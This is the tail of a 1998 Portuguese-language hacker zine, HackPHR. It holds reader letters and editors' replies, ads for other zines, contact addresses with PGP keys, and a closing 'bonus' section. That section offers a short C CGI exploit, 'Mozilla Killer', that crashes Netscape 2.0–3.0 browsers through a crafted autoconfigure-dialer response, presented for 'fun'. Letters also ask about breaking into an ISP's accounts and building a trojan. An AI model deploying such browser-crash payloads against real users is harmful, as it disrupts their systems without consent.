Word 8.0000 R$: soh 999,99. Sobre a telefonia Brasileira, tem uma box nessa edi‡ao e na outra vai ter as voltagens dos telefones a cartao. Sobre o PGP, o Cebola vai fazer um tutorial pra proxima edi‡ao... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Ola... estou mandando este E-MAIL para lhes pedir um favor... Eu não poderei assesar Internet por um tempo apenas E-MAIL e gostaria de saber se vcs. poderiam mandar os arquivos sobre PRHECK e as bovas edicoes que viram a ser feitas do Hack and Phreak... Obridado pela atenc~zao maito:????@???????.???.?? *As edicoes 0 e 1 eu ja tenho e dou-lhes os parabens por elas RESPOSTA: Serio? Eu tmb nao vou poder, vc poderia autalizar minha HP, escre- ver materias pro zine, responder os mail, e se vc cozinha bem, po- deria fazer meu almo‡o? Acha q sou quem cara? Suporte tecnico da MicroSoft? -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- E aC ! Eu sou Rafael, um beginner, gostaria de saber como faGo para acessar o banco de dados do computador central de um pequeno provedor (para ter acesso as contas, poder alterA-las, abrir novas contas, etc...) Ficaria muito grato se vc me respondesse, o meu e-mail I: RESPOSTAS: Hamm, proxima pergunta... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Eu achei demais a zine de vocês! Eu que sou um iniciante na area hacker e aumentei muito o meu conhecimento no assunto depois de ter lido as 3 zines já feitas, uma aprendizagem facil e, finalmente, alguem que respeita os iniciantes e faz uma oposiçao aos lamers... Vocês deveriam colocar mais assuntos hackers e continuar sem aquela trolha de comandos a baboseiras que as TRADICIONAIS costumam fazer. Gostaria de saber como se faz aquele cavalo de troia da zine dois... Eu gostaria de fazer algo pela zine mas eu sou um perdido na area hacker( como eu ja disse ainda estou caminhando...), mas tem o tema anarquia que eu nao entendo o que tem de anarquico nisso...Sei sobre a anarquia e outras cossitas mas.... Valeu e continuem assim! PS: eu nao tenho qbasic, onde eu consigo e como se abre arquivos nele...Bem coisa de begginer... MORRAM LAMERS! RESPOSTA: QUALQUER pergunta direcionada a programa‡ao perguntem ao Cebola, mandem mails pra ele. cebola_br@hotmail.com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Fala Mandrack! Gostei muito do zine, estou aprendendo muito com ele. Tambem gostaria de dizer que posso ajudar com a pagina do zine, qqr coisa é só falar, ok? =^) Tenho uma nova home page em http://www.theoffice.net/flaviosr mas ainda esta em construcao... RESPOSTA: Muito legal mesmo saber q vcz aprendem e dao valor ao zine, ao con- trario de muitos q vivem do deboche. Se quiser ajudar com o HP, nos estamos precisando, entre em contato com a gente... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Ae galera do Hacker n' Pheaker..blz?? Recebi esses Zines e adorei! São de mais!! Eu ja li muito Zine...mas muito mesmo!! E o Zine que achei mais legal ta sendo este! Principalmente a parte Virii...que esta sendo escrita pelo Cebola... Ele explica muito bem!1 Valeu mesmo galera E vamo ver se num deixa esse Zine morrer como deixaram o Quebra de Sigilo morrer!! []s A todos e Fuuuiiiii Vulcano RESPOSTA: :) 1998, HackPHR Zine -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 11 - ANUNCIOS, PUBLICA€OES E MISC. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Este eh um espa‡o q a hackPHR abriu no zine para anuncios de outros zines e anuncios diversos, como IRContros, BBSz, Home Pages, etc... E o melhor de tudo, eh gratis! Apenas mande um e-mail contendo o q vc quer publicar, o nome, etc... U H F Z I N E [unit hacker force] Visite a HP do UHF Zine, info, e um zine totalmente destinado aos newbies... Vale a pena conferir: http://uhf.base.org C Y C L O N E H O M E P A G E http://www.terravista.ciclone.com.br/areiasbrancas/1365/index.html 1998, HackPHR Zine -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 12 - ENTRANDO EM CONTATO -=-=-=-=-=-=-=-=-=-=-=-=-=-=- Se vc quiser comentar sobre uma materia ou alguma coisa assim, mande um mail para o autor. Se vc nao sabe, no indice e no rodape de cada materia tem o nome do autor q escreveu, para comentarios gerais sobre o zine, mande para hacphr@hotmail.com. Use este apenas para comentarios, criticas, sugestoes, e etc... Para falar pessoalmente com a gente, ou para se candidatar a editor: MaNdRaCk: mandrack@geocities.com Cebola : cebola_br@hotmail.com Se quiser usar o PGP: MaNdRaCk's PUBLIC KEY: Type Bits/KeyID Date User ID pub 1024/A236997D 1997/10/24 MaNdRaCk -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3i mQCNAzRRBvsAAAEEANLxPF+C/i4WsgKCIctJJEIHRKbYlS3+Wl9Zr2+XWEnN4IeF 2bInC3BR+gMGKqVdzo3cWjvyyi/QnrzhR1HmTlkleNlPPbe/TMW1lYasBW66A9G/ vQoUgVCuCbLQUxdRmcNWnXEB6gRewVftCjfNfvXoI11XPopdqPcda8aiNpl9AAUR tBtNYU5kUmFDayA8bWFuZHJhY2tAdXNhLm5ldD6JAJUDBRA0UQb79x1rxqI2mX0B AfSwA/4/FAHPxuCSAdTY9Kdul6EKbaYf2tHDNd0NIpNqrjTiJ3oiVaPiQUR6eMlv ei1CkNFbAe2tRgWIoucUyOjX6ZTijaB9Fd1mBbAuZStuArL9kSGXzkHoEJZYwyRU dv6DY8s+0C3om3BoF05lVn/mcgnmdsMFs8d+EeXY/R0EzL4RZg== =tkyG -----END PGP PUBLIC KEY BLOCK----- Cebola's PUBLIC KEY: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2i mQCNAzSgZvwAAAEEAM7Fl1R3Kd8sXY0eWm5H+0XKOBO3g6ifpFaz6G+EVW7jjeMO hs9qW5Kco0bxHOAb8qfILAq3604MtnjiU/yCpk95ZbKjB7GonNeMQVwlhvdAIzyc A+FvKBzLegWVUz2g3mEs3K1bq16HQFrg4h/w7wTbh8JYmDAh4g5foeaTuHMRAAUR tC9GcmVkZXJpY28gV2FnbmVyIE8uIE1lbG8gPGxvcmVuemFAYmhuZXQuY29tLmJy Pg== =OV6h -----END PGP PUBLIC KEY BLOCK----- 1998, HackPHR Zine -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 13 - BRINDE: X-PLOIT P/ NETSCAPE E IE -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Aqui estah um exploit q existe no Netscape, a versao 4.0 do Netscape corrige este bug, mas jah dah pra vc se divertir, hehehe --cut here-- /* Mozilla Killer Detona todos os navegadores Netscape for Windows v2.0-3.0. Ele pode funcio- nar nas novas versoes 3.0 p/ Macintosh. Eh soh compilar a fonte e colocar um link pro cgi... */ #include void main (void) { printf ("Content-type: application/x-netscape-autoconfigure-dialer\n\n"); printf ("%c%c %c%c ", 237, 237, 237, 237); } --cut here-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 1998, Fevereiro. Hack and Phreak Zine, QUALQUER copia de QUALQUER materia deste documento, deve constar as seguintes linhas: (nomedoautor) HackPHR Zine n. xx http://www.hackphr.home.ml.org -=-=-=-=-=-=-=-=-=-=-=-=-=-=|FiM dO dOCuMeNtO|=-=-=-=-=-=-=-=-=-=-=-=-=-=-